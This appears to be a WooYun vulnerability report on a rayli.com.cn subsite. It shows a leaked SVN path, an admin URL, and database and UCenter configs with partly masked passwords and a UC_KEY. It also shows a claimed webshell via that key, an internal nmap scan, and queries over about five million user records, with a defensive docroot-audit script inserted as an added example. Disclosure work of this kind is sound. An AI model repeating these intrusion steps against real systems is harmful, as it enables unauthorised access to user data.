WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-01-03: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-01-05: The vendor has confirmed the issue; details are disclosed to the vendor only.
2015-01-08: The vendor has fixed the vulnerability and disclosed it proactively; details are now public.
Sensitive information disclosure on a Rayli (rayli.com.cn) subsite (a direct threat to the user database)
SVN metadata disclosure: http://xiangmai.rayli.com.cn/.svn/entries
Admin backend: http://xiangmai.rayli.com.cn/index.php?/admin/login
$active_group = 'default';
$active_record = TRUE;

$db['default']['hostname'] = '58.68.225.131';
$db['default']['username'] = 'rayli_tuitui';
$db['default']['password'] = '*******************';
$db['default']['database'] = 'rayli_tuitui';
$db['default']['dbdriver'] = 'mysql';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;

$db['sa']['hostname'] = '58.68.225.131';
$db['sa']['username'] = 'rayli_tuitui';
$db['sa']['password'] = '*******************';
$db['sa']['database'] = 'rayli_tuitui';
$db['sa']['dbdriver'] = 'mysql';
$db['sa']['dbprefix'] = '';
$db['sa']['pconnect'] = TRUE;
$db['sa']['db_debug'] = TRUE;
$db['sa']['cache_on'] = FALSE;
$db['sa']['cachedir'] = '';
$db['sa']['char_set'] = 'utf8';
$db['sa']['dbcollat'] = 'utf8_general_ci';
$db['sa']['swap_pre'] = '';
$db['sa']['autoinit'] = TRUE;
$db['sa']['stricton'] = FALSE;
Using the obtained UC_KEY to get a webshell directly
<?php
define('UC_CONNECT', '');
define('UC_DBHOST', '192.168.0.13');
define('UC_DBUSER', 'discuz');
define('UC_DBPW', '1qaz2w****l0.13');
define('UC_DBNAME', 'uc');
define('UC_DBCHARSET', 'gbk');
define('UC_DBTABLEPRE', '`uc`.uc_');
define('UC_DBCONNECT', '0');
define('UC_KEY', '1facNvxogx*******60TvvygnvUSUVk');
define('UC_API', 'http://***.rayli.com.cn/uc');
define('UC_CHARSET', 'gbk');
define('UC_IP', '');
define('UC_APPID', '20');
define('UC_PPP', '20');
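The two leaks above (VCS metadata under the document root, and framework config files carrying database credentials and the UC_KEY) are exactly what a pre-deploy audit of the document root should catch. The following is an added example, not code from the original report: it walks a local document root, flags .svn/.git directories, and flags files whose contents match the credential keys seen in the leaked CodeIgniter and UCenter configs. The sample layout built in demo() (an application/config/database.php path and its contents) is constructed for illustration.

```python
"""Pre-deploy audit for the leak class in this report: VCS metadata (.svn/.git)
and credential-bearing config files left inside a web document root.
Added example; not part of the original report."""
import os
import re
import tempfile
from pathlib import Path

VCS_DIRS = {".svn", ".git", ".hg"}
# Key names taken from the leaked CodeIgniter and UCenter configs on this page.
CRED_PATTERNS = [
    re.compile(r"\$db\[[^\]]+\]\[['\"]password['\"]\]\s*=", re.I),
    re.compile(r"define\(\s*['\"]UC_(KEY|DBPW)['\"]", re.I),
]
MAX_FILE_BYTES = 1 << 20  # skip large files / binaries


def audit_docroot(root):
    """Return sorted (kind, relative_path) findings for a document root."""
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel = Path(dirpath).relative_to(root)
        for d in list(dirnames):
            if d in VCS_DIRS:  # report it and do not descend into it
                findings.append(("vcs-metadata", str(rel / d)))
                dirnames.remove(d)
        for f in filenames:
            p = Path(dirpath) / f
            try:
                if p.stat().st_size > MAX_FILE_BYTES:
                    continue
                text = p.read_text(errors="ignore")
            except OSError:
                continue  # unreadable or dangling entry; not our concern here
            if any(pat.search(text) for pat in CRED_PATTERNS):
                findings.append(("credentials-in-file", str(rel / f)))
    return sorted(findings)


def demo():
    """Build a constructed sample docroot mirroring the report, then audit it."""
    root = Path(tempfile.mkdtemp())
    (root / ".svn").mkdir()
    (root / ".svn" / "entries").write_text("12\n")  # constructed stub
    (root / "application" / "config").mkdir(parents=True)
    (root / "application" / "config" / "database.php").write_text(
        "<?php\n$db['default']['password'] = 'constructed-sample';\n")
    (root / "index.php").write_text("<?php echo 'ok';\n")  # clean file
    return audit_docroot(root)


if __name__ == "__main__":
    for kind, path in demo():
        print(f"{kind}: {path}")
```

Run it against the real document root before publishing a release; any finding means a web-server deny rule for dot-directories is no substitute for not shipping the files at all.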
sh-3.2# nmap -sT -sV 192.168.0.13
nmap -sT -sV 192.168.0.13

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2015-01-03 00:58 CST
Interesting ports on localhost (192.168.0.13):
Not shown: 1676 closed ports
PORT     STATE SERVICE     VERSION
25/tcp   open  smtp        Exim smtpd
465/tcp  open  smtps?
587/tcp  open  submission?
3306/tcp open  mysql       MySQL 5.0.77-log
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port587-TCP:V=4.11%I=7%D=1/3%Time=54A6CE5B%P=x86_64-redhat-linux-gnu%r(
SF:GenericLines,20,"554\x20SMTP\x20synchronization\x20error\r\n");
MAC Address: 00:22:19:BD:54:DB (Unknown)
select url from uc_applications;
+--------------------------------------+
| url                                  |
+--------------------------------------+
| http://ucclient.rayli.com.cn         |
| http://blog.rayli.com.cn             |
| http://pass.rayli.com.cn             |
| http://adsite2.rayli.com.cn/APPDemo/ |
| http://q.rayli.com.cn                |
| http://3w.rayli.com.cn/registration/ |
| http://bbs.rayli.com.cn              |
| http://credit.rayli.com.cn/          |
| http://product.rayli.com.cn/         |
| http://star.rayli.com.cn             |
| http://testgo.rayli.com.cn           |
| http://xiangmai.rayli.com.cn         |
+--------------------------------------+
12 rows in set (0.01 sec)
select count(*) from uc_members;
+----------+
| count(*) |
+----------+
|  5118858 |
+----------+
1 row in set (0.00 sec)
Severity: High
Vulnerability Rank: 13
Confirmed at: 2015-01-05 14:36
We are already aware of this vulnerability, thank you for the reminder; we are carrying out a comprehensive fix for it.
2015-01-08: Many thanks, it has been fixed.